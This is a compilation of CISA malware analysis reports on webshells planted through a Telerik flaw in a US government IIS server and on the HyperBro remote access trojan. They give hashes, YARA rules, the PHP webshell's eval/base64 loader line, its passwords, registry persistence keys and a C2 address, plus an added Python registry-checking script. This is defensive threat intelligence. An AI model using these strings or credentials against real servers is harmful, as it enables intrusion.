  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

June 14, 2023

MAR-10443863-1.v1 CVE-2017-9248 Exploitation in U.S. Government IIS Server | CISA


Summary

Description

CISA received three files for analysis. The files included three webshells written in PHP: Hypertext Preprocessor (PHP), Active Server Pages Extended (ASPX), and .NET Dynamic-Link Library (DLL). The sample “sd.php” is highly obfuscated and uses the rot13 algorithm, zlib compression, and base64 encoding for obfuscation. The “osker.aspx” webshell code was padded with junk code. The .NET DLL webshell is a .NET compiled version of osker.aspx. The samples are interactive webshells that have the ability to upload and manage files, create directories and files, and execute commands on the target machine.

For more information about this compromise, see Joint Cybersecurity Advisory Threat Actors Exploit Progress Telerik Vulnerabilities in Multiple U.S. Government IIS Servers

Download the PDF version of this report:

MAR-10443863.r1.v1 (PDF, 864.35 KB )

For a downloadable copy of IOCs, see below or the JSON file.

AA23-074A.stix (XML, 38.86 KB )
Submitted Files (3)

6ce087b904af8a01aae73ac77d81822ad41799f89a5d301dce45191c897012aa (osker.aspx)

b63c95300c8e36b5e6d3393da12931683796f88fd4601ba8364658b4d12ac05b (App_Web_jl37rjxu.dll)

ea98368f6ecb5281654a6a9e4c649ef9b53860f1ee32340145b61e0e42e1072a (sd.php)

Findings

ea98368f6ecb5281654a6a9e4c649ef9b53860f1ee32340145b61e0e42e1072a

Tags

obfuscated trojan uploader webshell

Details


Name sd.php
Size 5934 bytes
Type ASCII text, with very long lines, with CRLF line terminators
MD5 f899d6cbe1be6395a0fa2a802b8eb579
SHA1 e5f29cac0570665bc12f54a7e1894f139cc7b45e
SHA256 ea98368f6ecb5281654a6a9e4c649ef9b53860f1ee32340145b61e0e42e1072a
SHA512 6a9c23c3bd8a4b5f7301b80b7187ed6ae055a4e05e2b817800ddade99cb45e50bf3a96a57f9593aa8dfb49934ea48dba722ba3f4b0e8a8a634e6c86da335dcba
ssdeep 96:8byUcBL9vPh8onLQKwz9UL0wJ0v7R/+B3Oam8WgbVxzbiMhrhRrwSLpVt8lTHGk4:icBL9vFnL1wzGL0tt/cVxzvhrhRZl4hO
Entropy 6.110792
Malware Result unknown
Antivirus
ESET PHP/Agent.NPM trojan
YARA Rules
  • rule CISA_10443863_01 : backdoor remote_access_trojan webshell exploitation information_gathering remote_access accesses_remote_machines anti_debugging captures_system_state_data controls_local_machine compromises_data_availability compromises_data_integrity fingerprints_host installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10443863"
           Date = "2023-05-11"
           Last_Modified = "20230522_1200"
           Actor = "n/a"
           Family = "n/a"
           Capabilities = "accesses-remote-machines anti-debugging captures-system-state-data controls-local-machine compromises-data-availability compromises-data-integrity fingerprints-host installs-other-components"
           Malware_Type = "backdoor remote-access-trojan webshell"
           Tool_Type = "exploitation information-gathering remote-access"
           Description = "Detects obfuscated and deobfuscated interactive PHP webshell samples"
           SHA256 = "ea98368f6ecb5281654a6a9e4c649ef9b53860f1ee32340145b61e0e42e1072a"
       strings:
           $e0 = { 65 76 61 6c }
           $e1 = { 72 6f 74 31 33 }
           $e2 = { 62 61 73 65 36 34 }
           $e3 = { 67 7a 69 6e 66 6c 61 74 65 }
           $e4 = { 73 68 65 6c 6c }
           $e5 = { 78 61 69 73 79 6e 64 69 63 61 74 65 }
           $e6 = { 54 75 62 61 67 75 73 4e 4d }
           $s0 = { 58 30 4d 42 31 33 }
           $s1 = { 74 75 6e 61 66 65 65 73 68 }
           $s2 = { 70 61 73 73 77 6f 72 64 }
           $s3 = { 6f 6e ( 63 | 43 ) 6c 69 63 6b 3d }
           $s4 = { 6a 61 76 61 73 63 72 69 70 74 3a 78 79 6e }
       condition:
           (6 of ($e*)) or (3 of ($s*))
    }
ssdeep Matches

No matches found.

Description

This sample is an obfuscated PHP interactive webshell. The webshell is encoded and obfuscated using rot13, gzinflate and base64, as seen in the following code: “eval(str_rot13(gzinflate(str_rot13(base64_decode(($sym))))));”. The obfuscated code is stored as a string in the $sym variable, from which it is read and decoded upon execution (Figure 1). The webshell requires the password "pass" for authentication and uses the string “$xyn='tunafeesh';” as a cookie to authenticate.

This webshell enumerates the local system it infects including the operating system, current user, directories, files and permissions. The webshell has the ability to create, rename, and delete files and directories. Furthermore, it has the ability to upload additional files to the affected webserver, run in Safe Mode and execute commands via cmd.exe (Figure 2). The webshell provides a Graphical User Interface (GUI) to the operator to perform these operations on the infected machine.

---Notable Strings Begin---
eval(str_rot13(gzinflate(str_rot13(base64_decode(($sym))))));
tunafeesh
pass
TubagusNM
xaisyndicate
garuda tersakti
con7ext_shell
b374k shell
X0MB13
[email protected]
hxxp[:]//www[.]twitter[.]com/X0MB13_
hxxp[:]//www[.]fb[.]com/xombie.xombie.7
onClick="xyn
---Notable Strings End---

Screenshots
AR23-166A Figure 1

Figure 1. - $sym variable with obfuscated code.

AR23-166A Figure 2

Figure 2. - sd.php webshell interface. A Threat Actor (TA) would access this interface remotely to conduct actions such as uploading additional files, creating directories and files, running commands, and more.

6ce087b904af8a01aae73ac77d81822ad41799f89a5d301dce45191c897012aa

Tags

backdoor trojan webshell

Details


Name osker.aspx
Size 107843 bytes
Type data
MD5 fcb8a6a264d05f1689c9dce5824b217d
SHA1 001e4906879e78d567a30502638233f34292504a
SHA256 6ce087b904af8a01aae73ac77d81822ad41799f89a5d301dce45191c897012aa
SHA512 703437c5742f343cabc6023698e031f0c4167252e9679d4e4fd13d9703f27de21faa7edf275bd9a39c4b2e454a83c43d555849ae61a0897ac1da9ed6be820d4d
ssdeep 3072:K+mYWYJo8+p87xbsTttEtizQhch+mYWYJo8+pO:K+mYDnhch+mYDD
Entropy 6.343192
Malware Result unknown
Antivirus
IKARUS Trojan.ASP.Agent
McAfee ASP/Backdoor.i
Varist JS/Agent.AIW
YARA Rules
  • rule CISA_10443863_02 : backdoor remote_access_trojan webshell exploitation information_gathering remote_access accesses_remote_machines anti_debugging captures_system_state_data controls_local_machine compromises_data_availability compromises_data_integrity fingerprints_host installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10443863"
           Date = "2023-05-11"
           Last_Modified = "20230522_1200"
           Actor = "n/a"
           Family = "n/a"
           Capabilities = "accesses-remote-machines anti-debugging captures-system-state-data controls-local-machine compromises-data-availability compromises-data-integrity fingerprints-host installs-other-components"
           Malware_Type = "backdoor remote-access-trojan webshell"
           Tool_Type = "exploitation information-gathering remote-access"
           Description = "Detects interactive ASP NET webshell samples"
           SHA256 = "ea98368f6ecb5281654a6a9e4c649ef9b53860f1ee32340145b61e0e42e1072a"
       strings:
           $s0 = { 3c 25 40 20 50 61 67 65 20 4c 61 6e 67 75 61 67 65 3d 22 43 23 22 }
           $s1 = { 62 61 73 65 36 34 ( 44 | 64 ) 65 63 6f 64 65 }
           $s2 = { 53 65 6c 65 63 74 20 2a 20 66 72 6f 6d 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 }
           $s3 = { 53 45 4c 45 43 54 20 2a 20 46 52 4f 4d }
           $s4 = { 73 71 6c 63 6d 64 2e 65 78 65 }
           $s5 = { 63 6d 64 2e 65 78 65 }
           $s6 = { 49 49 53 20 56 65 72 73 69 6f 6e }
           $s7 = { 43 72 65 61 74 65 4e 6f 57 69 6e 64 6f 77 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Relationships
6ce087b904... Related_To b63c95300c8e36b5e6d3393da12931683796f88fd4601ba8364658b4d12ac05b
Description

This sample is an ASP .NET webshell. The webshell code was padded with junk code for detection evasion. The beginning of the webshell code can be seen in Figure 3. It is possible to access the webshell interactively via browser to view the GUI as seen in Figure 4.

This webshell has the ability to enumerate drive names and types, software, operating system versions, processes, and users, and has the ability to copy, create and delete files, directories and databases. Furthermore, this webshell is able to upload, download, run and execute commands using cmd.exe and sqlcmd.exe. This webshell has the ability to interact with and manipulate SQL databases. It also uses Windows Management Instrumentation (WMI) Management Objects to query processes, users and network domains, and is able to encode and decode data using base64.

---Notable Strings Begin---
osker
321
base64Decode
Select * from Win32_Process
Select * from Win32_Process Where ProcessID
Add_Table_Row(tbl, "Server IP", Request.ServerVariables["LOCAL_ADDR"]);
Add_Table_Row(tbl, "Host Name", Dns.GetHostName() );//Environment.MachineName);
Add_Table_Row(tbl, "IIS Version", Request.ServerVariables["SERVER_SOFTWARE"]);
Add_Table_Row(tbl, "IIS APPPOOL Identity", Environment.UserName);
Add_Table_Row(tbl, "OS Version", Environment.OSVersion.ToString());
myconn = new SqlConnection(connections.Text);
myconn.Open();
string command = query;
mycomm = new SqlCommand(command, myconn);
SqlDataReader dr = mycomm.ExecuteReader();
string query = "Select * from Win32_Process Where ProcessID = "" + processName + """;
ManagementObjectSearcher searcher = new ManagementObjectSearcher(query);
ManagementObjectCollection processList = searcher.Get();
ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
---Notable Strings End---

Screenshots
aa23-166a Figure 3.

Figure 3. - Beginning of osker.aspx webshell code.

ar23-166a Figure 4

Figure 4. - Web interface for osker.aspx webshell. The webshell interface password is “321”.

b63c95300c8e36b5e6d3393da12931683796f88fd4601ba8364658b4d12ac05b

Tags

backdoor trojan webshell

Details


Name App_Web_jl37rjxu.dll
Size 163840 bytes
Type PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 71323c956317b6b2c8e4ed4595ccfe5a
SHA1 7ebd98f97f61cabff05438dfac34d0331ce233aa
SHA256 b63c95300c8e36b5e6d3393da12931683796f88fd4601ba8364658b4d12ac05b
SHA512 2da3716aab9c9a8a85705c1372c4d75250dc021caa4f3b7566f6c142bdb3a45a063ec5f343b15b9be6056890768e80e7512f6ddbb86de178c475a160f56c0dad
ssdeep 3072:XEFKnpDtdIftAIe66rOqhTG0t7x2IftAIe66rOqhTG0:XEyJXmtQTO+ymtQTO+
Entropy 5.776030
Malware Result unknown
Antivirus
Antiy Trojan[Backdoor]/ASP.WebShell
Avira BDS/Redcap.euknj
Bitdefender Trojan.Generic.33706396
Emsisoft Trojan.Generic.33706396 (B)
McAfee RDN/Generic BackDoor
Zillya! Backdoor.WebShell.Script.653
YARA Rules
  • rule CISA_10443863_03 : backdoor remote_access_trojan webshell exploitation information_gathering remote_access accesses_remote_machines anti_debugging captures_system_state_data controls_local_machine compromises_data_availability compromises_data_integrity fingerprints_host installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10443863"
           Date = "2023-05-16"
           Last_Modified = "20230605_1500"
           Actor = "n/a"
           Family = "n/a"
           Capabilities = "accesses-remote-machines anti-debugging captures-system-state-data controls-local-machine compromises-data-availability compromises-data-integrity fingerprints-host installs-other-components"
           Malware_Type = "backdoor remote-access-trojan webshell"
           Tool_Type = "exploitation information-gathering remote-access"
           Description = "Detects .NET DLL webshell samples"
           SHA256 = "b63c95300c8e36b5e6d3393da12931683796f88fd4601ba8364658b4d12ac05b"
       strings:
           $s0 = { 53 00 65 00 6c 00 65 00 63 00 74 00 20 00 2a 00 20 00 66 00 72 00 6f 00 6d 00 20 00 57 00 69 00 6e 00 33 00 32 00 5f 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 }
           $s1 = { 62 61 73 65 36 34 ( 44 | 64 ) 65 63 6f 64 65 }
           $s2 = { 53 00 45 00 4c 00 45 00 43 00 54 00 20 00 2a 00 20 00 46 00 52 00 4f 00 4d }
           $s3 = { 49 00 49 00 53 00 20 00 41 00 50 00 50 00 50 00 4f 00 4f 00 4c }
           $s4 = { 4d 61 6e 61 67 65 6d 65 6e 74 4f 62 6a 65 63 74 }
           $s5 = { 43 72 65 61 74 65 4e 6f 57 69 6e 64 6f 77 }
           $s6 = { 73 71 6c 71 75 65 72 79 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Relationships
b63c95300c... Related_To 6ce087b904af8a01aae73ac77d81822ad41799f89a5d301dce45191c897012aa
Description

This is a 32-bit .NET Dynamic-Link Library (DLL) file. This sample is an ASP .NET webshell and is related to the osker.aspx file. These webshells may affect Microsoft Exchange Servers and IIS services exploited by the ProxyLogon vulnerability. This sample is a .NET DLL file that is created by the ASP.NET Runtime when the ASPX script is seen for the first time on the system. The capabilities and functions are identical to the osker.aspx file.

Relationship Summary

6ce087b904... Related_To b63c95300c8e36b5e6d3393da12931683796f88fd4601ba8364658b4d12ac05b
b63c95300c... Related_To 6ce087b904af8a01aae73ac77d81822ad41799f89a5d301dce45191c897012aa

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.


November 25, 2022

MAR-10365227-2.v1 | CISA

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts by the Cybersecurity and Infrastructure Security Agency (CISA) to provide detailed analysis of files associated with HyperBro, a Remote Access Trojan (RAT). CISA obtained HyperBro malware samples during an on-site incident response engagement at a Defense Industrial Base (DIB) Sector organization compromised by advanced persistent threat (APT) actors.

CISA analyzed 4 files associated with HyperBro malware. The files create a backdoor program that is capable of uploading and downloading files to and from the system. The RAT is also capable of logging keystrokes and executing commands on the system.

For more information on the confirmed compromise, see Joint CSA: Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization.

Download the STIX version of this report: MAR-10365227-2.v1 249B

Submitted Files (4)

52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7 (vftrace.dll)

df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348 (msmpeng.exe)

f1a2791eebaea183f399110c9e8ae11c67f5bebf93a5573d1ac3c56fc71b2230 (config.ini)

f2ba8b8aabf73020febd3a925276d52ce88f295537fe57723df714c13f5a8780 (thumb.dat)

IPs (1)

104.168.236.46

Findings

df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348

Tags

loader

Details
Name msmpeng.exe
Size 351240 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 4109ac08bdc8591c7b46348eb1bca85d
SHA1 6423d1c324522bfd2b65108b554847ac4ab02479
SHA256 df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348
SHA512 0605362190a9cb04a7392c7eae3ef79964a76ea68dc03dfabe6ec8f445f1c355772f2ca8166cbee73188e57bff06b74fb2cfa59869cb4461fffe1c3589856554
ssdeep 6144:BTMoU0+zvvLIpa8bo5GOc1G41vupWn2rwRGekPHZLZKA1UnmOlm:XUDvvsc80AOc1GYvAW2EGtH5ZKAKmOQ
Entropy 6.471736
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2016-01-05 08:22:40-05:00
Import Hash b66afb12e84aa5ce621a6635837cadba
Company Name CyberArk Software Ltd.
File Description CyberArk Viewfinity
Internal Name vf_host.exe
Legal Copyright Copyright © 1999-2016 CyberArk Software Ltd. All Rights Reserved.
Original Filename vf_host.exe
Product Name CyberArk Viewfinity
Product Version 5.5.10.101
PE Sections
MD5 Name Raw Size Entropy
3822119e846581669481aba79308c57c header 1024 2.580725
98ccfff2af4ccaa3335f63592a1fba02 .text 270848 6.543317
9dcc89a0d16e36145bb07924ca260dfe .rdata 50688 5.132125
14d493033fc147f67601753310725b2b .data 5632 3.711689
615729d1383743a91b8baf309f1a8232 .rsrc 16896 4.839559
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
df847abbfa... Used 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
Description

This artifact is a version of vf_host.exe from Viewfinity. The file is used to side-load the malicious dynamic-link library (DLL), vftrace.dll.

The program is also capable of bypassing User Account Control (UAC) on the system by disabling Admin Approval Mode in the User Account Control Group Policy in HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System. This can allow the malware to run with Admin privileges, or allow remote logon (RDP) with full Admin privileges.

52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7

Tags

trojan

Details
Name vftrace.dll
Size 73728 bytes
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 7655ff65f74f08ee2c54f44e5ef8f098
SHA1 3c7beb8978feac9ba8f5bab0656242232471bf7d
SHA256 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
SHA512 efea9b8a7b6b7cfa31814af4ffe45fab68d159a6239271b632166b2f6b44af8a4e1cc559fa56537ec4142e0484031a9b79034d4e5a8cbbf1d5250b86370cdfcf
ssdeep 1536:d0X1BkgxVXJyBaUihWutqQQ4znsWgcdqydbPX:O7XMBOs41znqypP
Entropy 6.334911
Antivirus
Adaware Gen:Variant.Bulz.429221
AhnLab Trojan/Win.HYPERBRO
Avira TR/Injector.nmrbf
Bitdefender Gen:Variant.Bulz.429221
Comodo Malware
Cyren W32/Agent.GCPS-3922
ESET a variant of Win32/LuckyMouse.BR trojan
IKARUS Trojan.Win32.LuckyMouse
K7 Riskware ( 0040eff71 )
NANOAV Trojan.Win32.LuckyMouse.iwacwz
Sophos Troj/Agent-BGVD
Trend Micro Trojan.780F7AE8
Trend Micro HouseCall Trojan.780F7AE8
VirusBlokAda TScope.Malware-Cryptor.SB
Zillya! Trojan.LuckyMouse.Win32.24
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2021-03-02 02:18:56-05:00
Import Hash 182f35372e9fd050b6e0610238bcd9fd
PE Sections
MD5 Name Raw Size Entropy
a89421fb59d33658892123b94906aa72 header 1024 2.836214
624b09cd367db7ebfc510aab51f95791 .text 42496 6.692212
8885c137e1772d11b48e71da92aa3d3c .rdata 23552 4.949495
2304803a4ce5a785e19eb0b45efb7065 .data 2048 2.051382
2139727f6ccf1b15d0f96e805001b2fc .gfids 512 1.386027
a4fc8d9199bcb8669008e62d5dc7d675 .rsrc 512 4.712298
73a0737f1475d88793ad42fc04bef1ab .reloc 3584 6.466489
Packers/Compilers/Cryptors
Borland Delphi 3.0 (???)
Relationships
52072a8f99... Connected_To 104.168.236.46
52072a8f99... Used_By df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348
52072a8f99... Created f1a2791eebaea183f399110c9e8ae11c67f5bebf93a5573d1ac3c56fc71b2230
52072a8f99... Created f2ba8b8aabf73020febd3a925276d52ce88f295537fe57723df714c13f5a8780
Description

This DLL is side-loaded by df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348 detailed in this report.

When the DLL is executed it will create a Globally Unique Identifier (GUID) to identify the system to the command and control (C2) during communication. The GUID is written to a file called 'Config.ini' and placed in the current directory.

The program will decrypt and read a configuration file called 'thumb.dat' that instructs it to spawn a new instance of the Service Host Process (svchost.exe) and inject itself into the new instance. Svchost.exe is run with the -k netsvcs parameter to allow the malware to connect to its C2. The malware collects the following information to send to the C2 via POST when establishing a connection.

---Begin Collected Information---
Computer Name
IP Address
Path to the malware location
Process name that it is running in (svchost.exe)
Mode
Name of the malware
GUID
---End Collected Information---

During analysis, the malware attempted to connect to the Uniform Resource Identifier (URI), hxxps[:]//104.168.236.46/api/v2/ajax using the fixed User-Agent string Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36.

To achieve persistence on the system, the program creates a service in the registry called ‘Windows Defenders Service’ that starts automatically when the user logs on.

---Begin Registry Settings---
HKLM\System\CurrentControlSet\services\windefenders\Type    Data: 272
HKLM\System\CurrentControlSet\services\windefenders\Start    Data: 2
HKLM\System\CurrentControlSet\services\windefenders\ErrorControl    Data: 1
HKLM\System\CurrentControlSet\services\windefenders\ImagePath    Data: "C:\Program Files (x86)\Common Files\windefenders\msmpenge.exe"
HKLM\System\CurrentControlSet\services\windefenders\DisplayName    Data: Windows Defenders
HKLM\System\CurrentControlSet\services\windefenders\WOW64    Data: 1
HKLM\System\CurrentControlSet\services\windefenders\ObjectName    Data: LocalSystem
HKLM\System\CurrentControlSet\services\windefende37337060\DeleteFlag    Data: 1
HKLM\System\CurrentControlSet\services\windefende37337060\Start    Data: 4
HKLM\System\CurrentControlSet\services\windefenders\Description    Data: Windows Defenders Service
---End Registry Settings---

It may also create an autorun entry in the registry at HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
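As an added hunt helper (not CISA's code and not the malware's), the following Python parses service entries written in the report's "key  Data: value" layout, decodes the numeric Type and Start values into their Win32 service-control constants (272 = 0x110, that is own-process plus interactive; Start 2 = auto-start), and flags the combination documented above. The sample lines are constructed from the values listed in the report, and the heuristics in assess_service are this example's own assumptions.

```python
"""Decode and assess service registry settings of the kind HyperBro writes.

Added example, not CISA's code. Parses lines in the report's
"HKLM\\System\\CurrentControlSet\\services\\<svc>\\<value>  Data: <data>"
layout, decodes Type/Start, and returns findings for a defender to review.
"""
import re
from collections import defaultdict

# Win32 service Type bits (winsvc.h) and Start values, as stored in the registry.
SERVICE_TYPE_FLAGS = {
    0x001: "SERVICE_KERNEL_DRIVER",
    0x002: "SERVICE_FILE_SYSTEM_DRIVER",
    0x010: "SERVICE_WIN32_OWN_PROCESS",
    0x020: "SERVICE_WIN32_SHARE_PROCESS",
    0x100: "SERVICE_INTERACTIVE_PROCESS",
}
START_TYPES = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START",
               2: "SERVICE_AUTO_START", 3: "SERVICE_DEMAND_START",
               4: "SERVICE_DISABLED"}

LINE_RE = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\services\\([^\\]+)\\(\w+)\s+Data:\s*(.*?)\s*$",
    re.IGNORECASE)


def parse_registry_lines(text: str) -> dict:
    """Group 'Data:' lines by service key -> {value_name: data_string}."""
    services = defaultdict(dict)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            key, value, data = m.groups()
            services[key][value] = data.strip('"\u201c\u201d')
    return dict(services)


def decode_type(value: int) -> list:
    """Expand a Type DWORD into the SERVICE_* flag names it contains."""
    return [name for bit, name in SERVICE_TYPE_FLAGS.items() if value & bit]


def assess_service(name: str, values: dict) -> list:
    """Return findings explaining why this service entry looks suspicious.

    Heuristics are this example's assumptions, chosen to match the
    'windefenders' entry documented in the report.
    """
    findings = []
    type_flags = decode_type(int(values.get("Type", 0)))
    start = START_TYPES.get(int(values.get("Start", -1)), "unknown")
    if "SERVICE_INTERACTIVE_PROCESS" in type_flags:
        findings.append("Type has SERVICE_INTERACTIVE_PROCESS (0x100) set")
    if start == "SERVICE_AUTO_START" and \
            values.get("ObjectName", "").lower() == "localsystem":
        findings.append("auto-start service running as LocalSystem")
    if "\\common files\\" in values.get("ImagePath", "").lower():
        findings.append("ImagePath under Common Files instead of a product directory")
    display = values.get("DisplayName", "")
    # The genuine Defender service key is WinDefend; a look-alike display
    # name on any other key is worth a look.
    if re.search(r"windows\s+defenders?", display, re.I) and name.lower() != "windefend":
        findings.append(f"DisplayName '{display}' imitates the Defender service")
    if values.get("DeleteFlag") == "1":
        findings.append("DeleteFlag set: leftover key of a removed service")
    return findings


# Constructed from the values listed in the report (ImagePath uses the
# submitted file name msmpeng.exe).
SAMPLE = r"""
HKLM\System\CurrentControlSet\services\windefenders\Type    Data: 272
HKLM\System\CurrentControlSet\services\windefenders\Start    Data: 2
HKLM\System\CurrentControlSet\services\windefenders\ErrorControl    Data: 1
HKLM\System\CurrentControlSet\services\windefenders\ImagePath    Data: "C:\Program Files (x86)\Common Files\windefenders\msmpeng.exe"
HKLM\System\CurrentControlSet\services\windefenders\DisplayName    Data: Windows Defenders
HKLM\System\CurrentControlSet\services\windefenders\WOW64    Data: 1
HKLM\System\CurrentControlSet\services\windefenders\ObjectName    Data: LocalSystem
HKLM\System\CurrentControlSet\services\windefenders\Description    Data: Windows Defenders Service
"""

if __name__ == "__main__":
    for svc, vals in parse_registry_lines(SAMPLE).items():
        print(svc, decode_type(int(vals["Type"])), START_TYPES[int(vals["Start"])])
        for finding in assess_service(svc, vals):
            print("  -", finding)
```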

The malware creates a hidden folder called ‘windefenders’ in the path C:\Program Files (x86)\Common Files where it will copy the PE file ‘msmpeng.exe’ along with the GUID file, ‘config.ini’, the malicious library ‘vftrace.dll’, and the encrypted configuration file ‘thumb.dat’. A second hidden folder called ‘windefenders’ is also created in the path C:\ProgramData. This folder holds another instance of the PE file.

The program is capable of logging keystrokes, uploading and downloading files, and will also invoke RpcServerListen to wait for incoming Remote Procedure Call (RPC) connections. It will also open a pipe called ‘\Device\NamedPipe\testpipe’ that it uses to pass commands from its daemon to any worker processes it may set up.

104.168.236.46

Tags

command-and-control

URLs
  • hxxps[:]//104.168.236.46/api/v2/ajax
Ports
  • 443 TCP
Whois

Domain Name: HOSTWINDSDNS.COM
Registry Domain ID: 1655837964_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2021-06-25T06:27:14Z
Creation Date: 2011-05-12T23:01:53Z
Registry Expiry Date: 2029-05-12T23:01:53Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: DNS1.HOSTWINDSDNS.COM
Name Server: DNS2.HOSTWINDSDNS.COM
Name Server: DNS3.HOSTWINDSDNS.COM
Name Server: DNS4.HOSTWINDSDNS.COM
DNSSEC: unsigned

Relationships
104.168.236.46 Connected_From 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
Description

During analysis, the file vftrace.dll attempted to connect to this domain.

f1a2791eebaea183f399110c9e8ae11c67f5bebf93a5573d1ac3c56fc71b2230

Details
Name config.ini
Size 49 bytes
Type ASCII text, with CRLF line terminators
MD5 9d8d7d7bb357ee37a6ae71c5140f28b9
SHA1 40fc8b1a691339b9fa1526970ff2a2e1d3f899d7
SHA256 f1a2791eebaea183f399110c9e8ae11c67f5bebf93a5573d1ac3c56fc71b2230
SHA512 1d30fb579e0dba09b24669a5a981652f1f6404d2f536e8e640c48585b3035d0826fed15279568400418c19849e17489baccd18e35b53f8cdbc196a0dd5abd496
